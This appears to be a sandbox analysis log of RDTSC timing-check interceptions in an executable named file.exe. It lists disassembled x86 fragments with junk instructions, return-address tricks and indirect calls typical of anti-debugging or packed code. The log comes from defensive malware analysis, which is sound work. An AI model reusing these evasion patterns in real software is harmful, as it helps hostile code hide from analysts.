Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B823DB second address: B823F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0C91963h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B823F2 second address: B823F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B823F9 second address: B82474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edi 0x00000009 jmp 00007F08C0C91969h 0x0000000e pop edi 0x0000000f nop 0x00000010 call 00007F08C0C9195Eh 0x00000015 clc 0x00000016 pop ebx 0x00000017 push 00000000h 0x00000019 mov di, D141h 0x0000001d push 00000000h 0x0000001f mov edi, ebx 0x00000021 call 00007F08C0C91966h 0x00000026 mov edi, dword ptr [ebp+12467B75h] 0x0000002c pop edi 0x0000002d push eax 0x0000002e pushad 0x0000002f jng 00007F08C0C9195Ch 0x00000035 jo 00007F08C0C91956h 0x0000003b pushad 0x0000003c jmp 00007F08C0C9195Fh 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B81383 second address: B81421 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 mov ebx, 0DC10024h 0x0000000d push dword ptr fs:[00000000h] 0x00000014 or dword ptr [ebp+122D3915h], esi 0x0000001a mov dword ptr fs:[00000000h], esp 0x00000021 or dword ptr [ebp+1244A609h], edi 0x00000027 mov eax, dword ptr [ebp+122D06B1h] 0x0000002d push 00000000h 0x0000002f push edi 0x00000030 call 00007F08C0CB4528h 0x00000035 pop edi 0x00000036 mov dword ptr [esp+04h], edi 0x0000003a add dword ptr [esp+04h], 00000014h 0x00000042 inc edi 0x00000043 push edi 0x00000044 ret 0x00000045 pop edi 0x00000046 ret 0x00000047 call 00007F08C0CB452Dh 0x0000004c mov dword ptr [ebp+12467EBCh], ebx 0x00000052 pop edi 0x00000053 push FFFFFFFFh 0x00000055 push 00000000h 0x00000057 push eax 0x00000058 call 00007F08C0CB4528h 0x0000005d pop eax 0x0000005e mov dword ptr [esp+04h], eax 0x00000062 add dword ptr [esp+04h], 0000001Dh 0x0000006a inc eax 0x0000006b push eax 0x0000006c ret 0x0000006d pop eax 0x0000006e ret 0x0000006f ja 00007F08C0CB4529h 0x00000075 mov dword ptr [ebp+12459DD3h], eax 0x0000007b nop 0x0000007c push eax 0x0000007d push edx 0x0000007e push eax 0x0000007f push edx 0x00000080 jnp 00007F08C0CB4526h 0x00000086 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B81421 second address: B8142B instructions: 0x00000000 rdtsc 0x00000002 jp 00007F08C0C91956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B8142B second address: B8144B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0CB4531h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007F08C0CB4526h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B8144B second address: B81451 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B8258D second address: B825A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F08C0CB4528h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B825A2 second address: B825A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B825A6 second address: B825AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B84447 second address: B844B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F08C0C9195Ah 0x00000009 popad 0x0000000a push esi 0x0000000b jng 00007F08C0C91956h 0x00000011 pop esi 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 pushad 0x00000016 push eax 0x00000017 pop eax 0x00000018 push edi 0x00000019 pop edi 0x0000001a popad 0x0000001b pop eax 0x0000001c nop 0x0000001d and bl, 00000001h 0x00000020 mov edi, dword ptr [ebp+122D1E82h] 0x00000026 push 00000000h 0x00000028 mov ebx, dword ptr [ebp+122D33C3h] 0x0000002e push 00000000h 0x00000030 mov ebx, 23B06152h 0x00000035 xchg eax, esi 0x00000036 jmp 00007F08C0C91968h 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F08C0C91968h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B844B7 second address: B844BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B85388 second address: B853DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0C9195Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c or dword ptr [ebp+122D33CBh], esi 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007F08C0C91958h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 0000001Bh 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e sub dword ptr [ebp+124677ACh], ebx 0x00000034 push 00000000h 0x00000036 mov bl, 56h 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b jng 00007F08C0C91958h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B85637 second address: B85665 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F08C0CB453Fh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jng 00007F08C0CB4534h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B85665 second address: B85669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B865FE second address: B86609 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F08C0CB4526h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B86609 second address: B8660F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B8660F second address: B86613 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B86613 second address: B86693 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dword ptr [ebp+12461115h], eax 0x00000011 push dword ptr fs:[00000000h] 0x00000018 push 00000000h 0x0000001a push edx 0x0000001b call 00007F08C0C91958h 0x00000020 pop edx 0x00000021 mov dword ptr [esp+04h], edx 0x00000025 add dword ptr [esp+04h], 00000015h 0x0000002d inc edx 0x0000002e push edx 0x0000002f ret 0x00000030 pop edx 0x00000031 ret 0x00000032 mov dword ptr fs:[00000000h], esp 0x00000039 push 00000000h 0x0000003b push edi 0x0000003c call 00007F08C0C91958h 0x00000041 pop edi 0x00000042 mov dword ptr [esp+04h], edi 0x00000046 add dword ptr [esp+04h], 0000001Ah 0x0000004e inc edi 0x0000004f push edi 0x00000050 ret 0x00000051 pop edi 0x00000052 ret 0x00000053 mov eax, dword ptr [ebp+122D123Dh] 0x00000059 mov dword ptr [ebp+122DBA1Fh], ecx 0x0000005f push FFFFFFFFh 0x00000061 stc 0x00000062 nop 0x00000063 push eax 0x00000064 push edx 0x00000065 jmp 00007F08C0C91960h 0x0000006a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B86693 second address: B866A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 ja 00007F08C0CB4526h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ecx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B866A4 second address: B866AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B882EB second address: B882F9 instructions: 0x00000000 rdtsc 0x00000002 js 00007F08C0CB4526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B882F9 second address: B88390 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F08C0C91956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e call 00007F08C0C91969h 0x00000013 push ecx 0x00000014 call 00007F08C0C91969h 0x00000019 pop ebx 0x0000001a pop edi 0x0000001b pop ebx 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push ecx 0x00000021 call 00007F08C0C91958h 0x00000026 pop ecx 0x00000027 mov dword ptr [esp+04h], ecx 0x0000002b add dword ptr [esp+04h], 00000018h 0x00000033 inc ecx 0x00000034 push ecx 0x00000035 ret 0x00000036 pop ecx 0x00000037 ret 0x00000038 pushad 0x00000039 mov ebx, dword ptr [ebp+1244AFD7h] 0x0000003f mov ecx, ebx 0x00000041 popad 0x00000042 jmp 00007F08C0C9195Ch 0x00000047 push 00000000h 0x00000049 mov bh, al 0x0000004b add dword ptr [ebp+122D1F69h], eax 0x00000051 xchg eax, esi 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 jg 00007F08C0C91956h 0x0000005b jno 00007F08C0C91956h 0x00000061 popad 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B874CA second address: B874CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B88390 second address: B88395 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B8A227 second address: B8A2B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push esi 0x00000006 je 00007F08C0CB4526h 0x0000000c pop esi 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 jmp 00007F08C0CB4531h 0x00000016 ja 00007F08C0CB452Ch 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push ecx 0x00000021 call 00007F08C0CB4528h 0x00000026 pop ecx 0x00000027 mov dword ptr [esp+04h], ecx 0x0000002b add dword ptr [esp+04h], 00000016h 0x00000033 inc ecx 0x00000034 push ecx 0x00000035 ret 0x00000036 pop ecx 0x00000037 ret 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push ecx 0x0000003d call 00007F08C0CB4528h 0x00000042 pop ecx 0x00000043 mov dword ptr [esp+04h], ecx 0x00000047 add dword ptr [esp+04h], 0000001Ch 0x0000004f inc ecx 0x00000050 push ecx 0x00000051 ret 0x00000052 pop ecx 0x00000053 ret 0x00000054 jno 00007F08C0CB4527h 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d jmp 00007F08C0CB4533h 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B8A2B8 second address: B8A2BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B8FB22 second address: B8FB26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B947C1 second address: B947C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B947C5 second address: B947CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B947CB second address: B947F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F08C0C9195Ah 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F08C0C91969h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9494D second address: B9496A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0CB4535h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B94AE0 second address: B94AE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B94AE6 second address: B94B02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F08C0CB4538h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B94B02 second address: B94B0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F08C0C91956h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B99562 second address: B9957F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F08C0CB4535h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9957F second address: B99585 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B99585 second address: B99589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B99589 second address: B995A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 jc 00007F08C0C91956h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B997C5 second address: B997CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B997CB second address: B997D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B997D0 second address: B99860 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F08C0CB453Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c pushad 0x0000000d jp 00007F08C0CB4526h 0x00000013 jnc 00007F08C0CB4526h 0x00000019 popad 0x0000001a pop edi 0x0000001b mov eax, dword ptr [esp+04h] 0x0000001f jnp 00007F08C0CB452Eh 0x00000025 jbe 00007F08C0CB4528h 0x0000002b push ecx 0x0000002c pop ecx 0x0000002d mov eax, dword ptr [eax] 0x0000002f jng 00007F08C0CB453Dh 0x00000035 jmp 00007F08C0CB4537h 0x0000003a mov dword ptr [esp+04h], eax 0x0000003e pushad 0x0000003f jmp 00007F08C0CB4536h 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007F08C0CB4531h 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B99860 second address: B99864 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B99864 second address: 9D3E5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 jnp 00007F08C0CB452Bh 0x0000000e pushad 0x0000000f or ch, 0000003Bh 0x00000012 popad 0x00000013 push dword ptr [ebp+122D126Dh] 0x00000019 cld 0x0000001a call dword ptr [ebp+122D1FFEh] 0x00000020 pushad 0x00000021 jne 00007F08C0CB4527h 0x00000027 xor eax, eax 0x00000029 jnl 00007F08C0CB4527h 0x0000002f mov edx, dword ptr [esp+28h] 0x00000033 jno 00007F08C0CB452Ch 0x00000039 jmp 00007F08C0CB4539h 0x0000003e mov dword ptr [ebp+122D2EB9h], eax 0x00000044 pushad 0x00000045 sub dword ptr [ebp+122D33CBh], esi 0x0000004b add esi, dword ptr [ebp+122D2DB1h] 0x00000051 popad 0x00000052 mov esi, 0000003Ch 0x00000057 pushad 0x00000058 xor di, F3D0h 0x0000005d xor dword ptr [ebp+122D1C3Dh], edx 0x00000063 popad 0x00000064 add esi, dword ptr [esp+24h] 0x00000068 sub dword ptr [ebp+122D1C52h], edx 0x0000006e lodsw 0x00000070 jmp 00007F08C0CB4535h 0x00000075 add eax, dword ptr [esp+24h] 0x00000079 jnp 00007F08C0CB4527h 0x0000007f mov ebx, dword ptr [esp+24h] 0x00000083 jmp 00007F08C0CB452Fh 0x00000088 nop 0x00000089 pushad 0x0000008a push eax 0x0000008b jno 00007F08C0CB4526h 0x00000091 pop eax 0x00000092 push eax 0x00000093 push edx 0x00000094 jbe 00007F08C0CB4526h 0x0000009a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9AAD0 second address: B9AAE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F08C0C9195Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9AAE2 second address: B9AAE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9AAE6 second address: B9AAEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9AAEC second address: B9AB03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F08C0CB452Dh 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9AB03 second address: B9AB0D instructions: 0x00000000 rdtsc 0x00000002 jc 00007F08C0C9195Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9AB0D second address: B9AB25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F08C0CB452Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9AB25 second address: B9AB2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9AB2B second address: B9AB3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007F08C0CB4526h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9AB3A second address: B9AB3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA0610 second address: BA061B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F08C0CB4526h 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA061B second address: BA063B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F08C0C91963h 0x00000008 ja 00007F08C0C91956h 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9FA2A second address: B9FA2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9FA2F second address: B9FA35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9FA35 second address: B9FA3F instructions: 0x00000000 rdtsc 0x00000002 jne 00007F08C0CB4526h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9FDE8 second address: B9FDEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9FF5E second address: B9FF73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0CB4530h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA7202 second address: BA7216 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jnp 00007F08C0C91956h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007F08C0C9195Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B77915 second address: B77984 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007F08C0CB4528h 0x0000000f push edi 0x00000010 pop edi 0x00000011 pop edx 0x00000012 nop 0x00000013 pushad 0x00000014 jmp 00007F08C0CB4537h 0x00000019 or si, 5280h 0x0000001e popad 0x0000001f pushad 0x00000020 mov dword ptr [ebp+12467EBCh], ebx 0x00000026 mov dx, bx 0x00000029 popad 0x0000002a lea eax, dword ptr [ebp+1247767Ah] 0x00000030 push 00000000h 0x00000032 push edi 0x00000033 call 00007F08C0CB4528h 0x00000038 pop edi 0x00000039 mov dword ptr [esp+04h], edi 0x0000003d add dword ptr [esp+04h], 00000017h 0x00000045 inc edi 0x00000046 push edi 0x00000047 ret 0x00000048 pop edi 0x00000049 ret 0x0000004a mov di, ax 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 je 00007F08C0CB4528h 0x00000056 pushad 0x00000057 popad 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B77EA8 second address: B77EAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B77EAC second address: B77EBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007F08C0CB4526h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B77EBE second address: B77ED0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0C9195Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B77ED0 second address: B77ED6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B77ED6 second address: B77EDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B77EDA second address: 9D3E5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push dword ptr [ebp+122D126Dh] 0x0000000f xor di, 7D00h 0x00000014 call dword ptr [ebp+122D1FFEh] 0x0000001a pushad 0x0000001b jne 00007F08C0CB4527h 0x00000021 xor eax, eax 0x00000023 jnl 00007F08C0CB4527h 0x00000029 mov edx, dword ptr [esp+28h] 0x0000002d jno 00007F08C0CB452Ch 0x00000033 jmp 00007F08C0CB4539h 0x00000038 mov dword ptr [ebp+122D2EB9h], eax 0x0000003e pushad 0x0000003f sub dword ptr [ebp+122D33CBh], esi 0x00000045 add esi, dword ptr [ebp+122D2DB1h] 0x0000004b popad 0x0000004c mov esi, 0000003Ch 0x00000051 pushad 0x00000052 xor di, F3D0h 0x00000057 xor dword ptr [ebp+122D1C3Dh], edx 0x0000005d popad 0x0000005e add esi, dword ptr [esp+24h] 0x00000062 sub dword ptr [ebp+122D1C52h], edx 0x00000068 lodsw 0x0000006a jmp 00007F08C0CB4535h 0x0000006f add eax, dword ptr [esp+24h] 0x00000073 jnp 00007F08C0CB4527h 0x00000079 mov ebx, dword ptr [esp+24h] 0x0000007d jmp 00007F08C0CB452Fh 0x00000082 nop 0x00000083 pushad 0x00000084 push eax 0x00000085 jno 00007F08C0CB4526h 0x0000008b pop eax 0x0000008c push eax 0x0000008d push edx 0x0000008e jbe 00007F08C0CB4526h 0x00000094 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7801D second address: B78022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B78022 second address: B78062 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08C0CB452Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d je 00007F08C0CB4540h 0x00000013 jo 00007F08C0CB453Ah 0x00000019 jmp 00007F08C0CB4534h 0x0000001e mov eax, dword ptr [eax] 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 push edi 0x00000024 pop edi 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
